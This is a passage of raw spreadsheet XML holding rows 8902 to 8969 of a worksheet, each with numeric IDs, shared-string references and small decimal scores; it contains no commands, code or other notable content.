      <c r="C8902" s="2" t="s">
        <v>8484</v>
      </c>
      <c r="D8902" s="2">
        <v>1.0</v>
      </c>
      <c r="E8902" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8902" s="2">
        <v>0.1175925925925926</v>
      </c>
    </row>
    <row r="8903" ht="15.75" customHeight="1">
      <c r="A8903" s="1">
        <v>775.0</v>
      </c>
      <c r="B8903" s="2">
        <v>2.1077992E7</v>
      </c>
      <c r="C8903" s="2" t="s">
        <v>8485</v>
      </c>
      <c r="D8903" s="2">
        <v>1.0</v>
      </c>
      <c r="E8903" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8903" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8904" ht="15.75" customHeight="1">
      <c r="A8904" s="1">
        <v>1410.0</v>
      </c>
      <c r="B8904" s="2">
        <v>2.6430555E7</v>
      </c>
      <c r="C8904" s="2" t="s">
        <v>8486</v>
      </c>
      <c r="D8904" s="2">
        <v>1.0</v>
      </c>
      <c r="E8904" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8904" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8905" ht="15.75" customHeight="1">
      <c r="A8905" s="1">
        <v>1949.0</v>
      </c>
      <c r="B8905" s="2">
        <v>3.0233442E7</v>
      </c>
      <c r="C8905" s="2" t="s">
        <v>8487</v>
      </c>
      <c r="D8905" s="2">
        <v>1.0</v>
      </c>
      <c r="E8905" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8905" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8906" ht="15.75" customHeight="1">
      <c r="A8906" s="1">
        <v>1985.0</v>
      </c>
      <c r="B8906" s="2">
        <v>3.0487827E7</v>
      </c>
      <c r="C8906" s="2" t="s">
        <v>8488</v>
      </c>
      <c r="D8906" s="2">
        <v>1.0</v>
      </c>
      <c r="E8906" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8906" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8907" ht="15.75" customHeight="1">
      <c r="A8907" s="1">
        <v>3188.0</v>
      </c>
      <c r="B8907" s="2">
        <v>3.7170214E7</v>
      </c>
      <c r="C8907" s="2" t="s">
        <v>8489</v>
      </c>
      <c r="D8907" s="2">
        <v>1.0</v>
      </c>
      <c r="E8907" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8907" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8908" ht="15.75" customHeight="1">
      <c r="A8908" s="1">
        <v>6246.0</v>
      </c>
      <c r="B8908" s="2">
        <v>4.8100864E7</v>
      </c>
      <c r="C8908" s="2" t="s">
        <v>8490</v>
      </c>
      <c r="D8908" s="2">
        <v>1.0</v>
      </c>
      <c r="E8908" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8908" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8909" ht="15.75" customHeight="1">
      <c r="A8909" s="1">
        <v>9483.0</v>
      </c>
      <c r="B8909" s="2">
        <v>5.5888978E7</v>
      </c>
      <c r="C8909" s="2" t="s">
        <v>8491</v>
      </c>
      <c r="D8909" s="2">
        <v>1.0</v>
      </c>
      <c r="E8909" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8909" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8910" ht="15.75" customHeight="1">
      <c r="A8910" s="1">
        <v>15201.0</v>
      </c>
      <c r="B8910" s="2">
        <v>4.2077429E7</v>
      </c>
      <c r="C8910" s="2" t="s">
        <v>8492</v>
      </c>
      <c r="D8910" s="2">
        <v>1.0</v>
      </c>
      <c r="E8910" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8910" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8911" ht="15.75" customHeight="1">
      <c r="A8911" s="1">
        <v>15680.0</v>
      </c>
      <c r="B8911" s="2">
        <v>4.3832238E7</v>
      </c>
      <c r="C8911" s="2" t="s">
        <v>8493</v>
      </c>
      <c r="D8911" s="2">
        <v>1.0</v>
      </c>
      <c r="E8911" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8911" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8912" ht="15.75" customHeight="1">
      <c r="A8912" s="1">
        <v>17944.0</v>
      </c>
      <c r="B8912" s="2">
        <v>5.1249872E7</v>
      </c>
      <c r="C8912" s="2" t="s">
        <v>8494</v>
      </c>
      <c r="D8912" s="2">
        <v>1.0</v>
      </c>
      <c r="E8912" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8912" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8913" ht="15.75" customHeight="1">
      <c r="A8913" s="1">
        <v>21069.0</v>
      </c>
      <c r="B8913" s="2">
        <v>1.7883472E7</v>
      </c>
      <c r="C8913" s="2" t="s">
        <v>8495</v>
      </c>
      <c r="D8913" s="2">
        <v>1.0</v>
      </c>
      <c r="E8913" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8913" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8914" ht="15.75" customHeight="1">
      <c r="A8914" s="1">
        <v>24752.0</v>
      </c>
      <c r="B8914" s="2">
        <v>1.1815341E7</v>
      </c>
      <c r="C8914" s="2" t="s">
        <v>8496</v>
      </c>
      <c r="D8914" s="2">
        <v>1.0</v>
      </c>
      <c r="E8914" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8914" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8915" ht="15.75" customHeight="1">
      <c r="A8915" s="1">
        <v>30260.0</v>
      </c>
      <c r="B8915" s="2">
        <v>3.7623189E7</v>
      </c>
      <c r="C8915" s="2" t="s">
        <v>8497</v>
      </c>
      <c r="D8915" s="2">
        <v>1.0</v>
      </c>
      <c r="E8915" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8915" s="2">
        <v>0.1174863387978142</v>
      </c>
    </row>
    <row r="8916" ht="15.75" customHeight="1">
      <c r="A8916" s="1">
        <v>402.0</v>
      </c>
      <c r="B8916" s="2">
        <v>1.6680522E7</v>
      </c>
      <c r="C8916" s="2" t="s">
        <v>8498</v>
      </c>
      <c r="D8916" s="2">
        <v>1.0</v>
      </c>
      <c r="E8916" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8916" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="8917" ht="15.75" customHeight="1">
      <c r="A8917" s="1">
        <v>3121.0</v>
      </c>
      <c r="B8917" s="2">
        <v>3.6812686E7</v>
      </c>
      <c r="C8917" s="2" t="s">
        <v>8499</v>
      </c>
      <c r="D8917" s="2">
        <v>1.0</v>
      </c>
      <c r="E8917" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8917" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="8918" ht="15.75" customHeight="1">
      <c r="A8918" s="1">
        <v>5643.0</v>
      </c>
      <c r="B8918" s="2">
        <v>4.6264537E7</v>
      </c>
      <c r="C8918" s="2" t="s">
        <v>8500</v>
      </c>
      <c r="D8918" s="2">
        <v>1.0</v>
      </c>
      <c r="E8918" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8918" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="8919" ht="15.75" customHeight="1">
      <c r="A8919" s="1">
        <v>18984.0</v>
      </c>
      <c r="B8919" s="2">
        <v>5.4404502E7</v>
      </c>
      <c r="C8919" s="2" t="s">
        <v>8501</v>
      </c>
      <c r="D8919" s="2">
        <v>1.0</v>
      </c>
      <c r="E8919" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8919" s="2">
        <v>0.1173835125448029</v>
      </c>
    </row>
    <row r="8920" ht="15.75" customHeight="1">
      <c r="A8920" s="1">
        <v>6074.0</v>
      </c>
      <c r="B8920" s="2">
        <v>4.763503E7</v>
      </c>
      <c r="C8920" s="2" t="s">
        <v>8502</v>
      </c>
      <c r="D8920" s="2">
        <v>1.0</v>
      </c>
      <c r="E8920" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8920" s="2">
        <v>0.1169154228855721</v>
      </c>
    </row>
    <row r="8921" ht="15.75" customHeight="1">
      <c r="A8921" s="1">
        <v>1019.0</v>
      </c>
      <c r="B8921" s="2">
        <v>2.3165414E7</v>
      </c>
      <c r="C8921" s="2" t="s">
        <v>8503</v>
      </c>
      <c r="D8921" s="2">
        <v>1.0</v>
      </c>
      <c r="E8921" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8921" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8922" ht="15.75" customHeight="1">
      <c r="A8922" s="1">
        <v>7934.0</v>
      </c>
      <c r="B8922" s="2">
        <v>5.2590033E7</v>
      </c>
      <c r="C8922" s="2" t="s">
        <v>8504</v>
      </c>
      <c r="D8922" s="2">
        <v>1.0</v>
      </c>
      <c r="E8922" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8922" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8923" ht="15.75" customHeight="1">
      <c r="A8923" s="1">
        <v>8676.0</v>
      </c>
      <c r="B8923" s="2">
        <v>5.4389314E7</v>
      </c>
      <c r="C8923" s="2" t="s">
        <v>8505</v>
      </c>
      <c r="D8923" s="2">
        <v>1.0</v>
      </c>
      <c r="E8923" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8923" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8924" ht="15.75" customHeight="1">
      <c r="A8924" s="1">
        <v>19295.0</v>
      </c>
      <c r="B8924" s="2">
        <v>5.5189675E7</v>
      </c>
      <c r="C8924" s="2" t="s">
        <v>8506</v>
      </c>
      <c r="D8924" s="2">
        <v>1.0</v>
      </c>
      <c r="E8924" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8924" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8925" ht="15.75" customHeight="1">
      <c r="A8925" s="1">
        <v>19302.0</v>
      </c>
      <c r="B8925" s="2">
        <v>5.522208E7</v>
      </c>
      <c r="C8925" s="2" t="s">
        <v>8507</v>
      </c>
      <c r="D8925" s="2">
        <v>1.0</v>
      </c>
      <c r="E8925" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8925" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8926" ht="15.75" customHeight="1">
      <c r="A8926" s="1">
        <v>20964.0</v>
      </c>
      <c r="B8926" s="2">
        <v>1.6760998E7</v>
      </c>
      <c r="C8926" s="2" t="s">
        <v>8508</v>
      </c>
      <c r="D8926" s="2">
        <v>1.0</v>
      </c>
      <c r="E8926" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8926" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8927" ht="15.75" customHeight="1">
      <c r="A8927" s="1">
        <v>27085.0</v>
      </c>
      <c r="B8927" s="2">
        <v>2.0484859E7</v>
      </c>
      <c r="C8927" s="2" t="s">
        <v>8509</v>
      </c>
      <c r="D8927" s="2">
        <v>1.0</v>
      </c>
      <c r="E8927" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8927" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8928" ht="15.75" customHeight="1">
      <c r="A8928" s="1">
        <v>28339.0</v>
      </c>
      <c r="B8928" s="2">
        <v>2.5879564E7</v>
      </c>
      <c r="C8928" s="2" t="s">
        <v>8510</v>
      </c>
      <c r="D8928" s="2">
        <v>1.0</v>
      </c>
      <c r="E8928" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8928" s="2">
        <v>0.1164529914529914</v>
      </c>
    </row>
    <row r="8929" ht="15.75" customHeight="1">
      <c r="A8929" s="1">
        <v>68.0</v>
      </c>
      <c r="B8929" s="2">
        <v>1.1567171E7</v>
      </c>
      <c r="C8929" s="2" t="s">
        <v>8511</v>
      </c>
      <c r="D8929" s="2">
        <v>1.0</v>
      </c>
      <c r="E8929" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8929" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8930" ht="15.75" customHeight="1">
      <c r="A8930" s="1">
        <v>628.0</v>
      </c>
      <c r="B8930" s="2">
        <v>1.9649098E7</v>
      </c>
      <c r="C8930" s="2" t="s">
        <v>8512</v>
      </c>
      <c r="D8930" s="2">
        <v>1.0</v>
      </c>
      <c r="E8930" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8930" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8931" ht="15.75" customHeight="1">
      <c r="A8931" s="1">
        <v>679.0</v>
      </c>
      <c r="B8931" s="2">
        <v>2.0268316E7</v>
      </c>
      <c r="C8931" s="2" t="s">
        <v>8513</v>
      </c>
      <c r="D8931" s="2">
        <v>1.0</v>
      </c>
      <c r="E8931" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8931" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8932" ht="15.75" customHeight="1">
      <c r="A8932" s="1">
        <v>917.0</v>
      </c>
      <c r="B8932" s="2">
        <v>2.221583E7</v>
      </c>
      <c r="C8932" s="2" t="s">
        <v>8514</v>
      </c>
      <c r="D8932" s="2">
        <v>1.0</v>
      </c>
      <c r="E8932" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8932" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8933" ht="15.75" customHeight="1">
      <c r="A8933" s="1">
        <v>1248.0</v>
      </c>
      <c r="B8933" s="2">
        <v>2.5140174E7</v>
      </c>
      <c r="C8933" s="2" t="s">
        <v>8515</v>
      </c>
      <c r="D8933" s="2">
        <v>1.0</v>
      </c>
      <c r="E8933" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8933" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8934" ht="15.75" customHeight="1">
      <c r="A8934" s="1">
        <v>1467.0</v>
      </c>
      <c r="B8934" s="2">
        <v>2.6938128E7</v>
      </c>
      <c r="C8934" s="2" t="s">
        <v>8516</v>
      </c>
      <c r="D8934" s="2">
        <v>1.0</v>
      </c>
      <c r="E8934" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8934" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8935" ht="15.75" customHeight="1">
      <c r="A8935" s="1">
        <v>1678.0</v>
      </c>
      <c r="B8935" s="2">
        <v>2.8376031E7</v>
      </c>
      <c r="C8935" s="2" t="s">
        <v>8517</v>
      </c>
      <c r="D8935" s="2">
        <v>1.0</v>
      </c>
      <c r="E8935" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8935" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8936" ht="15.75" customHeight="1">
      <c r="A8936" s="1">
        <v>1826.0</v>
      </c>
      <c r="B8936" s="2">
        <v>2.932385E7</v>
      </c>
      <c r="C8936" s="2" t="s">
        <v>8518</v>
      </c>
      <c r="D8936" s="2">
        <v>1.0</v>
      </c>
      <c r="E8936" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8936" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8937" ht="15.75" customHeight="1">
      <c r="A8937" s="1">
        <v>1968.0</v>
      </c>
      <c r="B8937" s="2">
        <v>3.0362225E7</v>
      </c>
      <c r="C8937" s="2" t="s">
        <v>8519</v>
      </c>
      <c r="D8937" s="2">
        <v>1.0</v>
      </c>
      <c r="E8937" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8937" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8938" ht="15.75" customHeight="1">
      <c r="A8938" s="1">
        <v>1972.0</v>
      </c>
      <c r="B8938" s="2">
        <v>3.0412261E7</v>
      </c>
      <c r="C8938" s="2" t="s">
        <v>8520</v>
      </c>
      <c r="D8938" s="2">
        <v>1.0</v>
      </c>
      <c r="E8938" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8938" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8939" ht="15.75" customHeight="1">
      <c r="A8939" s="1">
        <v>2067.0</v>
      </c>
      <c r="B8939" s="2">
        <v>3.1074477E7</v>
      </c>
      <c r="C8939" s="2" t="s">
        <v>8521</v>
      </c>
      <c r="D8939" s="2">
        <v>1.0</v>
      </c>
      <c r="E8939" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8939" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8940" ht="15.75" customHeight="1">
      <c r="A8940" s="1">
        <v>2328.0</v>
      </c>
      <c r="B8940" s="2">
        <v>3.2936022E7</v>
      </c>
      <c r="C8940" s="2" t="s">
        <v>8522</v>
      </c>
      <c r="D8940" s="2">
        <v>1.0</v>
      </c>
      <c r="E8940" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8940" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8941" ht="15.75" customHeight="1">
      <c r="A8941" s="1">
        <v>2366.0</v>
      </c>
      <c r="B8941" s="2">
        <v>3.3241019E7</v>
      </c>
      <c r="C8941" s="2" t="s">
        <v>8523</v>
      </c>
      <c r="D8941" s="2">
        <v>1.0</v>
      </c>
      <c r="E8941" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8941" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8942" ht="15.75" customHeight="1">
      <c r="A8942" s="1">
        <v>2527.0</v>
      </c>
      <c r="B8942" s="2">
        <v>3.4076296E7</v>
      </c>
      <c r="C8942" s="2" t="s">
        <v>8524</v>
      </c>
      <c r="D8942" s="2">
        <v>1.0</v>
      </c>
      <c r="E8942" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8942" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8943" ht="15.75" customHeight="1">
      <c r="A8943" s="1">
        <v>2953.0</v>
      </c>
      <c r="B8943" s="2">
        <v>3.6009487E7</v>
      </c>
      <c r="C8943" s="2" t="s">
        <v>8525</v>
      </c>
      <c r="D8943" s="2">
        <v>1.0</v>
      </c>
      <c r="E8943" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8943" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8944" ht="15.75" customHeight="1">
      <c r="A8944" s="1">
        <v>3160.0</v>
      </c>
      <c r="B8944" s="2">
        <v>3.7017603E7</v>
      </c>
      <c r="C8944" s="2" t="s">
        <v>8526</v>
      </c>
      <c r="D8944" s="2">
        <v>1.0</v>
      </c>
      <c r="E8944" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8944" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8945" ht="15.75" customHeight="1">
      <c r="A8945" s="1">
        <v>3252.0</v>
      </c>
      <c r="B8945" s="2">
        <v>3.7389693E7</v>
      </c>
      <c r="C8945" s="2" t="s">
        <v>8527</v>
      </c>
      <c r="D8945" s="2">
        <v>1.0</v>
      </c>
      <c r="E8945" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8945" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8946" ht="15.75" customHeight="1">
      <c r="A8946" s="1">
        <v>3395.0</v>
      </c>
      <c r="B8946" s="2">
        <v>3.8021292E7</v>
      </c>
      <c r="C8946" s="2" t="s">
        <v>8528</v>
      </c>
      <c r="D8946" s="2">
        <v>1.0</v>
      </c>
      <c r="E8946" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8946" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8947" ht="15.75" customHeight="1">
      <c r="A8947" s="1">
        <v>3810.0</v>
      </c>
      <c r="B8947" s="2">
        <v>4.0061708E7</v>
      </c>
      <c r="C8947" s="2" t="s">
        <v>8529</v>
      </c>
      <c r="D8947" s="2">
        <v>1.0</v>
      </c>
      <c r="E8947" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8947" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8948" ht="15.75" customHeight="1">
      <c r="A8948" s="1">
        <v>3860.0</v>
      </c>
      <c r="B8948" s="2">
        <v>4.0320964E7</v>
      </c>
      <c r="C8948" s="2" t="s">
        <v>8530</v>
      </c>
      <c r="D8948" s="2">
        <v>1.0</v>
      </c>
      <c r="E8948" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8948" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8949" ht="15.75" customHeight="1">
      <c r="A8949" s="1">
        <v>3995.0</v>
      </c>
      <c r="B8949" s="2">
        <v>4.0877631E7</v>
      </c>
      <c r="C8949" s="2" t="s">
        <v>8531</v>
      </c>
      <c r="D8949" s="2">
        <v>1.0</v>
      </c>
      <c r="E8949" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8949" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8950" ht="15.75" customHeight="1">
      <c r="A8950" s="1">
        <v>4005.0</v>
      </c>
      <c r="B8950" s="2">
        <v>4.0915738E7</v>
      </c>
      <c r="C8950" s="2" t="s">
        <v>8532</v>
      </c>
      <c r="D8950" s="2">
        <v>1.0</v>
      </c>
      <c r="E8950" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8950" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8951" ht="15.75" customHeight="1">
      <c r="A8951" s="1">
        <v>4040.0</v>
      </c>
      <c r="B8951" s="2">
        <v>4.1041287E7</v>
      </c>
      <c r="C8951" s="2" t="s">
        <v>8533</v>
      </c>
      <c r="D8951" s="2">
        <v>1.0</v>
      </c>
      <c r="E8951" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8951" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8952" ht="15.75" customHeight="1">
      <c r="A8952" s="1">
        <v>4157.0</v>
      </c>
      <c r="B8952" s="2">
        <v>4.1490354E7</v>
      </c>
      <c r="C8952" s="2" t="s">
        <v>8534</v>
      </c>
      <c r="D8952" s="2">
        <v>1.0</v>
      </c>
      <c r="E8952" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8952" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8953" ht="15.75" customHeight="1">
      <c r="A8953" s="1">
        <v>4316.0</v>
      </c>
      <c r="B8953" s="2">
        <v>4.1998743E7</v>
      </c>
      <c r="C8953" s="2" t="s">
        <v>8535</v>
      </c>
      <c r="D8953" s="2">
        <v>1.0</v>
      </c>
      <c r="E8953" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8953" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8954" ht="15.75" customHeight="1">
      <c r="A8954" s="1">
        <v>4362.0</v>
      </c>
      <c r="B8954" s="2">
        <v>4.212021E7</v>
      </c>
      <c r="C8954" s="2" t="s">
        <v>8536</v>
      </c>
      <c r="D8954" s="2">
        <v>1.0</v>
      </c>
      <c r="E8954" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8954" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8955" ht="15.75" customHeight="1">
      <c r="A8955" s="1">
        <v>4677.0</v>
      </c>
      <c r="B8955" s="2">
        <v>4.3173741E7</v>
      </c>
      <c r="C8955" s="2" t="s">
        <v>8537</v>
      </c>
      <c r="D8955" s="2">
        <v>1.0</v>
      </c>
      <c r="E8955" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8955" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8956" ht="15.75" customHeight="1">
      <c r="A8956" s="1">
        <v>4715.0</v>
      </c>
      <c r="B8956" s="2">
        <v>4.3298071E7</v>
      </c>
      <c r="C8956" s="2" t="s">
        <v>8538</v>
      </c>
      <c r="D8956" s="2">
        <v>1.0</v>
      </c>
      <c r="E8956" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8956" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8957" ht="15.75" customHeight="1">
      <c r="A8957" s="1">
        <v>4727.0</v>
      </c>
      <c r="B8957" s="2">
        <v>4.3324453E7</v>
      </c>
      <c r="C8957" s="2" t="s">
        <v>8539</v>
      </c>
      <c r="D8957" s="2">
        <v>1.0</v>
      </c>
      <c r="E8957" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8957" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8958" ht="15.75" customHeight="1">
      <c r="A8958" s="1">
        <v>4737.0</v>
      </c>
      <c r="B8958" s="2">
        <v>4.3342149E7</v>
      </c>
      <c r="C8958" s="2" t="s">
        <v>8540</v>
      </c>
      <c r="D8958" s="2">
        <v>1.0</v>
      </c>
      <c r="E8958" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8958" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8959" ht="15.75" customHeight="1">
      <c r="A8959" s="1">
        <v>5583.0</v>
      </c>
      <c r="B8959" s="2">
        <v>4.606398E7</v>
      </c>
      <c r="C8959" s="2" t="s">
        <v>8541</v>
      </c>
      <c r="D8959" s="2">
        <v>1.0</v>
      </c>
      <c r="E8959" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8959" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8960" ht="15.75" customHeight="1">
      <c r="A8960" s="1">
        <v>5639.0</v>
      </c>
      <c r="B8960" s="2">
        <v>4.6261215E7</v>
      </c>
      <c r="C8960" s="2" t="s">
        <v>8542</v>
      </c>
      <c r="D8960" s="2">
        <v>1.0</v>
      </c>
      <c r="E8960" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8960" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8961" ht="15.75" customHeight="1">
      <c r="A8961" s="1">
        <v>5891.0</v>
      </c>
      <c r="B8961" s="2">
        <v>4.7095927E7</v>
      </c>
      <c r="C8961" s="2" t="s">
        <v>8543</v>
      </c>
      <c r="D8961" s="2">
        <v>1.0</v>
      </c>
      <c r="E8961" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8961" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8962" ht="15.75" customHeight="1">
      <c r="A8962" s="1">
        <v>5957.0</v>
      </c>
      <c r="B8962" s="2">
        <v>4.7289141E7</v>
      </c>
      <c r="C8962" s="2" t="s">
        <v>8544</v>
      </c>
      <c r="D8962" s="2">
        <v>1.0</v>
      </c>
      <c r="E8962" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8962" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8963" ht="15.75" customHeight="1">
      <c r="A8963" s="1">
        <v>5970.0</v>
      </c>
      <c r="B8963" s="2">
        <v>4.7329755E7</v>
      </c>
      <c r="C8963" s="2" t="s">
        <v>8545</v>
      </c>
      <c r="D8963" s="2">
        <v>1.0</v>
      </c>
      <c r="E8963" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8963" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8964" ht="15.75" customHeight="1">
      <c r="A8964" s="1">
        <v>6050.0</v>
      </c>
      <c r="B8964" s="2">
        <v>4.7608542E7</v>
      </c>
      <c r="C8964" s="2" t="s">
        <v>8546</v>
      </c>
      <c r="D8964" s="2">
        <v>1.0</v>
      </c>
      <c r="E8964" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8964" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8965" ht="15.75" customHeight="1">
      <c r="A8965" s="1">
        <v>6184.0</v>
      </c>
      <c r="B8965" s="2">
        <v>4.7907716E7</v>
      </c>
      <c r="C8965" s="2" t="s">
        <v>8547</v>
      </c>
      <c r="D8965" s="2">
        <v>1.0</v>
      </c>
      <c r="E8965" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8965" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8966" ht="15.75" customHeight="1">
      <c r="A8966" s="1">
        <v>6371.0</v>
      </c>
      <c r="B8966" s="2">
        <v>4.8378016E7</v>
      </c>
      <c r="C8966" s="2" t="s">
        <v>8548</v>
      </c>
      <c r="D8966" s="2">
        <v>1.0</v>
      </c>
      <c r="E8966" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8966" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8967" ht="15.75" customHeight="1">
      <c r="A8967" s="1">
        <v>6970.0</v>
      </c>
      <c r="B8967" s="2">
        <v>4.9991922E7</v>
      </c>
      <c r="C8967" s="2" t="s">
        <v>8549</v>
      </c>
      <c r="D8967" s="2">
        <v>1.0</v>
      </c>
      <c r="E8967" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8967" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8968" ht="15.75" customHeight="1">
      <c r="A8968" s="1">
        <v>7305.0</v>
      </c>
      <c r="B8968" s="2">
        <v>5.0848195E7</v>
      </c>
      <c r="C8968" s="2" t="s">
        <v>8550</v>
      </c>
      <c r="D8968" s="2">
        <v>1.0</v>
      </c>
      <c r="E8968" s="3" t="s">
        <v>7374</v>
      </c>
      <c r="F8968" s="2">
        <v>0.1163522012578616</v>
      </c>
    </row>
    <row r="8969" ht="15.75" customHeight="1">
      <c r="A8969" s="1">
        <v>7585.0</v>
      </c>
      <c r="B8969" s="2">
        <v>5.1593591E7</v>
      </c>
